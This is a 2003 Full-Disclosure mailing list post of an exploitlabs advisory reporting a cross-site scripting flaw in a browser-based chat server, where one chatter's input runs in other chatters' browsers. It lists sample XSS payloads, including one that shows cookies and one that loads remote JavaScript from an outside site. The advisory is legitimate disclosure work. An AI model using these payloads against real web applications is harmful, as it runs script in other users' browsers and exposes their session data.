[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] CHAT SERVER - XSS push

To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>
Subject: [Full-Disclosure] CHAT SERVER - XSS push
From: "morning_wood" <se_cur_ity@hotmail.com>
Date: Fri, 15 Aug 2003 15:40:09 -0700

------------------------------------------------------------------
          - EXPL-A-2003-019 exploitlabs.com Advisory 019
------------------------------------------------------------------
                             -= CHAT SERVER =-




exploitlabs
Aug 08, 2003


Product:
--------
Chat Server ( by author of "Sleuth 1.4" )
http://sandsprite.com/codestuff.asp

download and vb6 sources:
http://sandsprite.com/CodeStuff/chatserver.zip


Vunerability(s):
----------------
1. XSS ( push through )


Description of product:
-----------------------
Web browser based chatserver similar
 to the Magma Chatserver that powers huge
 sights like chatropolis.com. This will show
 just how they can stream text into a browser
 and display it realtime. Have an unlimited
 number of people all chatting at once using
 only their web browsers :) pretty neat

chatserver is an server application
and runs by default on port 80

note: chatropolis.com is not affected


VUNERABILITY / EXPLOIT
======================

1. XSS is able to be "pushed" from one
chatter to another, with the results being
"forced" into any other chatters browser
for execution.

examples:

<script>alert("You are vunerable to xss ")</script>

<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SC
RIPT>

<iframe src="http://whatismyip.com";></iframe>

<script language="JavaScript"
src="http://www.astalavista.com/backend/news.js";
type="text/javascript"></script>


note: the last one is remote code.

the vunerability exists in the sample provided and after compiling from
the provided sources.


Local:
------
yes


Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day


Vendor Contact:
---------------
Concurrent with this advisory
dzzie@yahoo.com

Vendor Response:
----------------
  :)



Credits:
--------

Donnie Werner
morning_wood@e2-labs.com
http://e2-labs.com
http://exploitlabs.com


original advisory may be obtained at
http://exploitlabs.com/files/advisories/EXPL-A-2003-019-chatserver.txt


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: Re: [Full-Disclosure] east coast powergrid / SCADA [OT?]
Next by Date: RE: [Full-Disclosure] Microsoft MCWNDX.OCX ActiveX buffer overflow
Prev by thread: [Full-Disclosure] Eudora Worldmail Server 2.0 -XSS Injection
Next by thread: [Full-Disclosure] UnixWare 7.1.x Open UNIX 8.0.0: exploitable buffer overrun in metamail
Index(es):
- Date
- Thread